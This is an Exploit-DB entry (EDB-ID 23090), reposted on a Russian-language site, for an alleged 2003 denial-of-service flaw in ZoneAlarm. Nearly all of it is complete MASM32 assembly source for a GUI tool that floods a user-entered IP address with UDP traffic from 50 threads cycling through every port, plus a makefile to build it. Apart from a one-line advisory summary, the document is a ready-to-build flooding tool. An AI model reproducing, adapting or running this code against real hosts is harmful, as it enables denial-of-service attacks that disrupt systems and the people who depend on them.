- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23090
- Проверка EDB
-
- Пройдено
- Автор
- IGOR FRANCHUK
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2003-09-02
Код:
source: https://www.securityfocus.com/bid/8525/info
A denial of service vulnerability has been alleged in ZoneAlarm. It is reportedly possible to reproduce this condition by sending a flood of UDP packets of random sizes to random ports on a system hosting the vulnerable software.
;// This is threadable UDP spammer
;/
;//
;// [email protected] Igor Franchuk
;//
;//---------------------------------------------------------------------------
; #########################################################################
.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
include \masm32\include\comctl32.inc
includelib \masm32\lib\comctl32.lib
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
; #########################################################################
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
SetTransparency proto :DWORD,:BYTE
GetRegString proto :DWORD,:DWORD,:DWORD,:DWORD
Spam proto :DWORD
; #########################################################################
.DATA
ClassName db "ZADOSWndClassObject",0
Caption db "ZoneAlarm DOS test",0
User32lib db "user32",0
SetLayeredWindowAttributesName db "SetLayeredWindowAttributes",0
SBuf db 255,255,255,255,255,255,255,255,255,255,255,255
IPEditBox db "SysIPAddress32",0
BtnName db "button",0
OKBtnCaption db "Spam",0
msgEmptyAdr db "Invalid IP",0
msgWinSockErrorAdr db "WinSocket 2.0 is required. WSAStartup failed",0
msgWinSockErrorSock db "Invalid socket",0
CancelBtnCaption db "Cancel",0
ProtoName db "udp",0
CThread DWORD 0
GThreadExit DWORD 0
.DATA?
hInstance HANDLE ?
hIPEditWnd HANDLE ?
hwndOKBtn HANDLE ?
hwndCancelBtn HANDLE ?
icex INITCOMMONCONTROLSEX <> ;structure for DateTimePicker
tIPAdr DWORD ?
Socket DWORD ?
tIPAdrSN HANDLE ?
WSAData WSADATA <>
SIN sockaddr_in <>
TID HANDLE ?
PROTOENTSTRUCT STRUCT
p_name DWORD ?
p_aliases DWORD ?
p_proto DWORD ?
PROTOENTSTRUCT ENDS
.CONST
WS_EX_LAYERED equ 80000h
LWA_ALPHA equ 2h
IPEditID equ 100h
OKBtnID equ 200h
CancelBtnID equ 201h
IPM_ISBLANK equ (WM_USER+105)
IPM_GETADDRESS equ (WM_USER+102)
; #########################################################################
REVERSE MACRO ip
push ebx
mov ebx, ip
xchg bh, bl
mov ax, bx
shr ebx, 16
xchg bh, bl
shl eax, 16
mov ax, bx
pop ebx
ENDM
MAKEWORD MACRO bLow, bHigh
mov eax, bLow
mov ebx, bHigh
shl ebx, 8
xor eax, ebx
ENDM
; #########################################################################
.CODE
start:
; #Init
invoke GetModuleHandle, NULL; get the instance handle of our program.
mov hInstance,eax
invoke GetCommandLine; get the instance handle of our program.
invoke WinMain, hInstance,NULL,eax, SW_SHOWDEFAULT ; call the main function
invoke ExitProcess,0
; #########################################################################
WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, lpCmdLine:HANDLE, mCmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hWnd:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style,CS_DBLCLKS + CS_HREDRAW + CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
;# WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW,\
invoke CreateWindowEx,\
WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW + WS_EX_WINDOWEDGE,\
ADDR ClassName,\
ADDR Caption,\
16CC0000h,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
256,\
118,\
NULL,\
NULL,\
hInst,\
NULL
mov hWnd,eax
invoke SetTransparency,hWnd,200
invoke ShowWindow, hWnd, mCmdShow
invoke UpdateWindow, hWnd
.WHILE TRUE ; Enter message loop
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam ; return exit code in eax
ret
WinMain endp
; #########################################################################
SetTransparency proc hWnd:HANDLE, bAlpha:BYTE
LOCAL hLib:HANDLE
LOCAL SetLayeredWindowAttr:HANDLE
LOCAL WInfo:DWORD
invoke LoadLibrary,addr User32lib
mov hLib,eax
.IF eax
invoke GetProcAddress, hLib, addr SetLayeredWindowAttributesName
mov SetLayeredWindowAttr, eax
.IF eax
invoke GetWindowLong,hWnd,GWL_EXSTYLE
or eax, WS_EX_LAYERED
invoke SetWindowLong, hWnd, GWL_EXSTYLE, eax
push LWA_ALPHA
xor eax,eax
mov al,bAlpha
push eax
push NULL
push hWnd
call [SetLayeredWindowAttr]
.ENDIF
invoke FreeLibrary,hLib
.ENDIF
ret
SetTransparency endp
; #########################################################################
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
LOCAL protoent:DWORD
mov eax, uMsg
.IF eax==WM_DESTROY ; if the user closes our window
invoke PostQuitMessage,NULL ; quit our application
.ELSEIF eax==WM_CREATE
invoke InitCommonControls
invoke CreateWindowEx,NULL,ADDR IPEditBox,NULL,\
WS_VISIBLE or WS_BORDER or WS_CHILD,11,\
90,180,25,hWnd,IPEditID,\
hInstance,NULL
mov hIPEditWnd,eax
invoke CreateWindowEx,NULL, ADDR BtnName,ADDR OKBtnCaption,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
35,50,80,25,hWnd,OKBtnID,hInstance,NULL
mov hwndOKBtn,eax
invoke CreateWindowEx,NULL, ADDR BtnName,ADDR CancelBtnCaption,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
134,50,80,25,hWnd,CancelBtnID,hInstance,NULL
mov hwndCancelBtn,eax
INVOKE EnableWindow,hwndCancelBtn,FALSE
invoke SetTransparency, hwndOKBtn, 500
invoke SetFocus,hIPEditWnd
.ELSEIF eax==WM_SIZE
mov eax,lParam
mov edx,eax
shr edx,16
and eax,0ffffh
mov ebx, eax
shr ebx,1
sub ebx,90
mov ecx,ebx
add ecx,99
push ecx
invoke MoveWindow,hIPEditWnd,ebx,10,180,25,TRUE
invoke MoveWindow,hwndOKBtn,ebx,50,80,25,TRUE
pop ecx
invoke MoveWindow,hwndCancelBtn,ecx,50,80,25,TRUE
; invoke MoveWindow,hwndStatus,0,0,0,0,TRUE
.ELSEIF eax==WM_COMMAND
mov eax,wParam
.IF lParam == 0;from what window hWnd = 0 - main, !=0 - from a child control
.ELSE
.IF ax==OKBtnID;what control
shr eax,16
.IF ax==BN_CLICKED;what message
invoke SendMessage, hIPEditWnd, IPM_ISBLANK, 0, 0
.IF !EAX
invoke SendMessage, hIPEditWnd, IPM_GETADDRESS, 0, ADDR tIPAdr
REVERSE tIPAdr
mov tIPAdr, eax
invoke inet_ntoa, tIPAdr
mov tIPAdrSN, eax
invoke MessageBox,NULL, tIPAdrSN,tIPAdrSN,MB_OK + MB_SYSTEMMODAL
MAKEWORD 2, 0
invoke WSAStartup,eax,ADDR WSAData
;invoke WSAStartup,101h,addr WSAData ;initialise le socket
.IF !eax
invoke getprotobyname, ADDR ProtoName
mov protoent, eax
mov edi, eax
assume edi:PTR PROTOENTSTRUCT
xor ebx,ebx
mov ebx, [edi].p_proto
assume edi:nothing
and ebx,00FFFFh
invoke socket,AF_INET,SOCK_DGRAM,ebx
.IF eax!=INVALID_SOCKET
mov Socket, eax
invoke EnableWindow,hwndOKBtn,FALSE
invoke EnableWindow,hwndCancelBtn,TRUE
mov SIN.sin_family,AF_INET
push tIPAdr
pop SIN.sin_addr
mov GThreadExit, 0
xor ebx, ebx
.WHILE ebx < 50
mov eax,OFFSET Spam
push ebx
invoke CreateThread,NULL,NULL,eax,ebx,NORMAL_PRIORITY_CLASS, ADDR TID
pop ebx
inc ebx
.ENDW
; mov eax,1
; invoke Spam, eax
.ELSE
invoke WSAGetLastError
invoke MessageBox,hWnd,ADDR msgWinSockErrorSock,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
.ENDIF
.ELSE
invoke MessageBox,hWnd,ADDR msgWinSockErrorAdr,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
.ENDIF
.ELSE
invoke MessageBox,hWnd,ADDR msgEmptyAdr,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
invoke SetFocus,hIPEditWnd
.ENDIF
.ENDIF
.ELSEIF ax==CancelBtnID;what control
shr eax,16
.IF ax==BN_CLICKED;what message
invoke EnableWindow,hwndOKBtn,TRUE
invoke EnableWindow,hwndCancelBtn,FALSE
mov GThreadExit, 1
invoke closesocket, Socket
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam ; Default message processing
ret
.ENDIF
xor eax,eax
ret
WndProc endp
; #########################################################################
Spam proc ThreadID:DWORD
xor edx, edx
mov ebx,1
.WHILE ebx
mov eax, ThreadID
.IF CThread == eax
mov ebx,0
.ENDIF
.IF GThreadExit == 1
mov ebx,0
.ENDIF
.IF edx < 65535
inc edx
.ELSE
xor edx,edx
.ENDIF
push edx
push ebx
invoke htons, edx
mov SIN.sin_port,ax
invoke connect, Socket, addr SIN ,sizeof SIN
invoke send, Socket, ADDR msgWinSockErrorAdr, 40, 0
pop ebx
pop edx
.ENDW
ret
Spam endp
end start
--------------------------------------make file-------------------------------------------
NAME=zados
$(NAME).exe: $(NAME).obj
Link /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib $(NAME).obj
$(NAME).obj: $(NAME).asm
ml /c /coff /Cp $(NAME).asm
- Источник
- www.exploit-db.com